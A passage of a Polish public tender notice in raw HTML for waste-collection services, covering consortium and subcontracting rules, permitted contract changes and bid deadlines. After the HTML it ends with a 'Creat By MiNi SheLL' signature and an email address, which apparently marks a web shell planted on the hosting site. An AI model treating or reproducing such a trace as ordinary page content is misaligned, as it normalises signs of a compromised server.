podmiotu udostępniającego zasoby 6) oświadczenie podmiotu udostępniającego zasoby,<br/> potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w<br/> jakim wykonawca powołuje się na jego zasoby według wzoru przekazanego przez zamawiającego. Uwaga! Ww.<br/> oświadczenie należy złożyć tylko wtedy, gdy wykonawca polega na zdolnościach lub sytuacji podmiotu udostępniającego<br/> zasoby <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, np. łącząc się w konsorcja lub spółki cywilne lub inną<br/> formę prawną. 2. Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu<br/> o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia<br/> publicznego.<br/> 3. Wykonawcy składający ofertą wspólną wraz z ofertą składają stosowne pełnomocnictwo w oryginale podpisane zgodnie z<br/> zaleceniami zawartymi w Rozdziale XI, uprawniające do wykonania określonych czynności w postępowaniu o udzielenie<br/> zamówienia publicznego. 4. Zamawiający w toku prowadzonego postępowania będzie przesyłał wszelką korespondencję do<br/> pełnomocnika Wykonawców występujących wspólnie. 5. Przed podpisaniem umowy (w przypadku wygrania postępowania)<br/> Wykonawcy składający wspólną ofertę będą mieli obowiązek przedstawić Zamawiającemu umowę konsorcjum, zawierającą,<br/> co najmniej: a) zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem<br/> realizację przedmiotu zamówienia oraz solidarnej odpowiedzialności za realizację zamówienia, b) określenie szczegółowego<br/> zakresu działania poszczególnych stron umowy, c) czas obowiązywania umowy, który nie może być krótszy, niż okres<br/> obejmujący realizację zamówienia. 6. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia brak<br/> podstaw wykluczenia musi wykazać każdy z Wykonawców oddzielnie, wobec powyższego wszystkie oświadczenia i dokumenty w zakresie braku podstaw wykluczenia wymagane w postępowaniu składa odrębnie każdy z wykonawców wspólnie występujących. 7. Korzystanie z<br/> podmiotów udostępniających zasoby: a) wykonawca może w celu potwierdzenia spełniania warunku udziału w<br/> postępowaniu polegać na zdolnościach<br/> technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z<br/> nimi stosunków prawnych, b) wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub<br/> sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na<br/> zdolnościach tych podmiotów. 8. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/> udostępniających zasoby, przedstawia,<br/> wraz z oświadczeniem, o którym mowa w art. 125 ust. 1 ustawy pzp, także oświadczenie podmiotu udostępniającego<br/> zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w<br/> zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/> 9. Informacja dla wykonawców zamierzających powierzyć wykonanie części zamówienia podwykonawcom.1) Zamawiający<br/> nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań. 2) Zamawiający żąda wskazania<br/> przez Wykonawcę części zamówienia, których wykonanie powierzy podwykonawcom. 3) Zamawiający nie wymaga od<br/> Wykonawcy, który zamierza powierzyć wykonanie części zamówienia podwykonawcom,<br/> złożenia oświadczenia w celu wykazania braku istnienia wobec nich podstaw wykluczenia z udziału w postępowaniu. 4)<br/> Umowa o podwykonawstwo będzie musiała określać, jaki zakres czynności zostanie powierzony podwykonawcom. 5)<br/> Zlecenie przez Wykonawcę wykonania części zamówienia podwykonawcom nie zwalnia Wykonawcy od<br/> odpowiedzialności za wykonie całości zamówienia, tj. dostaw wykonywanych przez siebie i zleconych. 10. Wykonawcy<br/> zagraniczni: Zamawiający nie wymaga złożenia dokumentów, o których mowa w § 4 Rozporządzenia<br/> Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych<br/> dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> a) stawki podatku od towarów i usług – strony uwzględnią nową wartość podatku VAT,<br/>b) w wyniku ograniczenia przez Zamawiającego potrzeby świadczenia usług odbioru i wywozu odpadów w szczególności w związku z przekazaniem obiektu/ obiektów lub części obiektu/ obiektów innemu podmiotowi, sprzedaży tego obiektu, a także w przypadku wystąpienia czynników o charakterze siły wyższej, w tym w przypadku ograniczenia działalności Zamawiającego w związku z epidemią, które uniemożliwiają bądź ograniczają potrzebę wykonywania przedmiotu umowy, w szczególności z uwagi na ograniczenie prowadzonej przez Zamawiającego działalności. W takim przypadku Zamawiający dopuszcza zmianę umowy poprzez zmianę wynagrodzenia Wykonawcy (z zastrzeżeniem niezmienności cen jednostkowych za usługę wskazanych w ofercie wykonawcy, stanowiącej załącznik nr 1), zmianę częstotliwości i ilości wywozu odpadów, zmianę miejsca wywozu odpadów, zmianę kontenerów/pojemników na odpady.<br/>c) w razie konieczności wyłączenia z użytkowania, obiektu/obiektów lub ich części. W takim przypadku Zamawiający dopuszcza zmianę umowy poprzez zmianę wynagrodzenia Wykonawcy (z zastrzeżeniem niezmienności cen jednostkowych za usługę wskazanych w ofercie wykonawcy, stanowiącej załącznik nr 1), zmianę częstotliwości i ilości wywozu odpadów, zmianę miejsca wywozu odpadów, zmianę kontenerów/pojemników na odpady.<br/>d) w razie konieczności zmiany częstotliwości świadczonych usług – zmianie ulegnie ilość i częstotliwość wywozów; <br/>e) w razie wystąpienia nieprzewidywalnych na etapie zawierania umowy okoliczności, które uniemożliwią realizowanie usług, w sposób przewidziany w ofercie, a udzielnie w tym zakresie innego zamówienia publicznego w trybie ustawy prawo zamówienia będzie niemożliwe lub niecelowe ze względu na interes publiczny. Zamawiający dopuszcza zmianę umowy poprzez zmianę wynagrodzenia Wykonawcy (z zastrzeżeniem niezmienności cen jednostkowych za usługę wskazanych w ofercie wykonawcy, stanowiącej załącznik nr 1), zmianę częstotliwości i ilości wywozu odpadów, zmianę miejsca wywozu odpadów, zmianę kontenerów/pojemników na odpady.<br/>f) gdy konieczność wprowadzenia modyfikacji wyniknie ze zmiany powszechnie obowiązujących przepisów prawa, na mocy których na zamawiającego lub wykonawcę nałożony zostanie obowiązek realizowania usług w sposób różniący się od zaoferowanego w ofercie – zmianie ulegną postanowienia, które będą miały na celu dostosowanie postanowień umowy do nowych przepisów,<br/>g) gdy wykonywanie przedmiotu umowy będzie niemożliwe lub znacznie utrudnione z uwagi na stan epidemii. Zamawiający dopuszcza wówczas zmiany umowy dotyczące częstotliwości lub terminu wywozu odpadów, zmiany pojemników/kontenerów na odpady w miejscach wskazanych w umowie,<br/>h) w przypadku wystąpienia siły wyższej, w szczególności w postaci zagrożenia o charakterze terrorystycznym lub sabotażowym, pożaru, powodzi czy huraganu, awarii technicznych zagrażających powstaniem szkody, stanu klęski żywiołowej, innego stanu nadzwyczajnego, który zostanie stwierdzony przez właściwe organy państwa w wymagany odpowiednimi przypisami sposób. Strony określą wówczas sposób wykonywania umowy możliwy w danych okolicznościach. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-18 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/osir.swinoujscie</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-18 12:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com